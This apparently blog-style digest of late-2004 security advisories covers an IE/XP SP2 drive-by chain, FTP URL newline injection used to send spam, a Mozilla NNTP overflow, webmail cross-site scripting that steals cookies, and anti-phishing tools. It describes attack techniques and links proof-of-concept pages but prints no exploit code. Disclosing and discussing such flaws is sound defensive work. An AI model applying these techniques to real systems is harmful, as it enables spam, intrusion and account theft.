Although hundreds of millions of dollars have been spent on securing SP2, perfection is impossible. Through the joint effort of Michael Evanchik and Paul from Greyhats Security, a very critical vulnerability has been developed that can compromise a user’s system without the need for user interaction besides visiting the malicious page. The vulnerability is not actually a vulnerability in itself, but rather it is uses multiple known holes in SP2 including Help ActiveX Control Related Topics Zone Security Bypass Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting Vulnerability.
* Microsoft Internet Explorer 6.0
* Microsoft Windows XP Pro SP2
* Microsoft Windows XP Home SP2
Proof of Concept:
See a proff of concept of the above code at: http://freehost07.websamba.com/greyhats/sp2rc.htm
* If an error is shown, press OK. This is normal.
* Notice in your startup menu a new file called Microsoft Office.hta. When run, this file will download and launch a harmless executable (which includes a pretty neat fire animation)
* Disable HTA files
* Disable Active Scripting in Internet Explorer
Both Internet Explorer and Konqueror can be tricked into sending mail through its FTP client without any more user interaction than loading a page.
* Internet Explorer version 6 SP1
* Konqueror version 3.2
* Mozilla Firefox version 1.0
Both Internet Explorer and Konqueror will accept %0a and %0d in URLs. In FTP URLs, it will accept them in the username part of the URL. Due to the similarity between the FTP and SMTP protocols, this can be used to send mail.
Spammers could host websites that contain images causing website visitors to spam more people. There are probably other protocols that the FTP client could be used to maliciously access.
Description: A heap overflow vulnerability was reported in Mozilla in the processing of NNTP URLs. A remote user can execute arbitrary code on the target system.
Maurycy Prodeus of iSEC Security Research reported that a remote user can create a specially crafted ‘news://’ URL that, when loaded by the target user, will trigger a buffer overflow and execute arbitrary code on the target user’s system. The code will run with the privileges of the target user.
The flaw resides in the *MSG_UnEscapeSearchUrl() function in ‘nsNNTPProtocol.cpp’.
The original advisory is available at: http://isec.pl/vulnerabilities/isec-0020-mozilla.txt
Impact: A remote user can create a URL that, when loaded by the target user, will execute arbitrary code on the target user’s system with the privileges of the target user.
Solution: The vendor has issued a fixed version (1.7.5), available at: http://www.mozilla.org/products/mozilla1.x/
ShredderSub7 SecExpert wrote:
“——————Which systems are vulnerable?——–
Any system running any Microsoft Windows XP edition with Internet Explorer 6 or higher, even with SP2 applied.
Any system running any Microsoft Windows Server 2003 edition with Internet Explorer 6 or higher.
——————How does this exploit work?———–
The problem with Internet Explorer is that it doesn’t set any restrictions on web pages that request opening a Windows Help file, compiled with HTML Help.
Without a restriction, we can (in Internet Explorer) easily command to open any local web page stored on a victim’s computer, including web pages that are founded in Windows Help files (with extension .CHM). “
Proof of concept was provided.
More info in http://securityfocus.com/archive/1/385573/2004-12-26/2005-01-01/0
The email services of several big Indian portals are susceptible to scripting attacks i.e., malicious code can be embedded by attackers into email messages, that, when received by unsuspecting users, can cause harmful effects. The services are Rediffmail.com, Indiatimes.com, Sify.com. The combined user base of these services runs into millions and all of these users are vulnerable. I’ve known about most of these vulnerabilities for years now and I am now releasing them because many are being massively exploited in the wild. All attempts to contact the vendors were unfruitful.
It is possible to embed malicious scripts in an ordinary email to users of these services because of certain flaws in their anti-scripting filters. Since, these filters are not as robust as the filters used by service providers like Yahoo and Hotmail, many more flaws, similar to those detailed here, are undoubtedly present in these services. Some of the attacks possible through exploitation of these flaws:
1. User names and passwords can be stolen. Spoofed login pages are one of the many methods to do so
2. Web pages belonging to the portals can be spoofed, including the shopping cart system
3. Any action that the legitimate user can take can also be taken by the malicious code. Cookies can be stolen
4. Malicious programs can be executed when combined with browser vulnerabilities
5. Force-feeding websites to users. Spammers, phishers and scammers can redirect users to their own pages
6. A malicious worm can be created which can traverse through the entire user base and cause destruction
7. Users can be locked out of their inboxes
Rediffmail has the most robust security system among all three. However, it is still susceptible to several attacks
Indiatimes Mail (http://email.indiatimes.com):
Indiatimes email does not have a scripting filter in place. This means all HTML tags including scripts can be embedded into the email without any security obstacles.
Several unsuccessful attempts have been made to contact the vendors. Emails alerts did not receive responses.
Complete details in http://www.securiteam.com/securitynews/6X00K20C1U.html
Lycos’s Free Email service “allows users to have their own web based email account very much like Hotmail”. A cross site scripting vulnerability in Lycos’s Free Email service allows an attacker to steal a user’s cookie allowing him full access to his Lycos email account. Further, due to a flaw in the way Lycos handles cookies, even if the user being attacked changes his password, the attacker can still gain access to his account as the cookie will remain valid
Proof of Concept was provided.
Another security program that is interesting to try and I think one feature that is attractive with this toolbar is… user can report a phished URL to help other people because once confirmed it is a phished URL, it will be blocked so other users will not become a victim
Netcraft Anti-Phishing Toolbar Available for Download
“The Netcraft Toolbar uses Netcraft’s enormous databases of web site information to show you all the attributes of each site you visit on the Web, including the sites’ hosting location, country, longevity and popularity.
Toolbar features include:
Clear display of sites’ hosting location at all times helps you validate fraudulent urls (e.g. the main online banking site of a large US bank is unlikely to be hosted in the former Soviet Union).
Once you report a phishing URL, it is blocked for other community members subsequently accessing it. The leverage of widely disseminated attacks (people constructing phishing attacks send literally millions of electronic mails in the expectation that some will reach customers of the bank) is utilized to expedite blocking of the fraud site.
Natively traps cross site scripting and other suspicious urls containing characters which have no common purpose other than to deceive.
Netcraft supervisor validation is used to contain the impact of any false reporting of urls.
Display of browser navigational controls (toolbar & address bar) in all windows, to defend against pop up windows which attempt to hide the navigational controls to disguise location.
Happily coexists with Google and other Toolbars.”
Read more in http://news.netcraft.com/archives/2004/12/28/netcraft_antiphishing_toolbar_available_for_download.html
A tutorial is also available – http://toolbar.netcraft.com/help/tutorials/using.html
Impact: Disclosure of system information, Disclosure of user information
Exploit Included: Yes
A vulnerability was reported in CleanCache. A local user can obtain files that have ostensibly been wiped from the computer.
WBG Links reported that a local user can invoke common data recovery tools to obtain files that should have been removed by CleanCache.
The vendor has been notified.
Impact: A local user can recover files that have ostensibly been deleted.
Solution: No solution was available at the time of this entry.
“Although the Court ruled against Microsoft’s request for interim measures, the company is encouraged by a number of aspects of the Court’s discussion of the merits of the case.”
Juergen Schmidt wrote in http://securityfocus.com/archive/1/385463/2004-12-22/2004-12-28/0 :
The new santy version not only attacks phpBB.
It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings